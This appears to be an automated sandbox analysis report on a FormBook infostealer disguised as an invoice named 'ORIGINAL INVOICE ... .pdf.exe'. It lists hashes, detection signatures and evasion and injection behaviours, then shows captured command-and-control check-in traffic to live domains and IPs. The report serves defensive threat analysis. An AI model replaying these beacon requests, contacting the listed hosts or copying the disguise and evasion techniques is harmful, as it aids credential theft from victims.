Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name: ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID: 1523775
MD5: 7d3ee1a73d9fbef171c785801ffcaff2
SHA1: 2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256: 1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags: exeuser-ngokoptmp
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38% Perma Link
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Joe Sandbox ML: detected
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose, 8_2_0327C000
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then xor eax, eax 8_2_03269B70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then mov ebx, 00000004h 8_2_03D304DE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058C2FA0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then xor eax, eax 9_2_058C7839
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058D2ACE

Networking

barindex
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80
Source: DNS query: www.kartal-nakliyat.xyz
Source: Joe Sandbox View IP Address: 52.223.13.41 52.223.13.41
Source: Joe Sandbox View ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View ASN Name: AS_LYREG3FR AS_LYREG3FR
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.yippie.worldUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.kartal-nakliyat.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.sidqwdf.funUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.resellnexa.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic DNS traffic detected: DNS query: www.yippie.world
Source: global traffic DNS traffic detected: DNS query: www.kartal-nakliyat.xyz
Source: global traffic DNS traffic detected: DNS query: www.sidqwdf.fun
Source: global traffic DNS traffic detected: DNS query: www.resellnexa.shop
Source: unknown HTTP traffic detected: POST /n8ew/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedHost: www.kartal-nakliyat.xyzOrigin: http://www.kartal-nakliyat.xyzReferer: http://www.kartal-nakliyat.xyz/n8ew/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 58 78 4b 66 4e 68 69 6b 35 6e 78 2b 2b 5a 67 49 52 53 78 43 53 64 69 4f 52 38 32 56 76 6d 47 48 76 65 4f 33 70 42 54 37 52 58 63 2b 63 39 76 54 69 6f 4f 45 78 70 2f 55 6d 4c 69 4b 71 35 71 69 64 56 46 56 45 67 64 62 34 4c 51 74 4c 44 6b 6d 37 4b 50 46 55 71 32 62 31 37 45 4d 62 67 79 6b 77 35 38 42 74 4b 2f 33 49 51 32 75 54 50 31 52 56 7a 38 2b 47 63 44 6e 48 54 6c 4a 73 32 71 64 41 31 62 4f 6a 77 75 57 39 4c 69 46 33 47 50 6b 32 4a 6b 67 72 59 2f 6a 59 5a 64 68 35 6f 75 2b 6d 61 45 61 55 4e 71 4d 41 78 79 4c 6b 67 43 64 7a 51 4f 6b 72 51 3d 3d Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 02 Oct 2024 00:06:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlru-ru
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
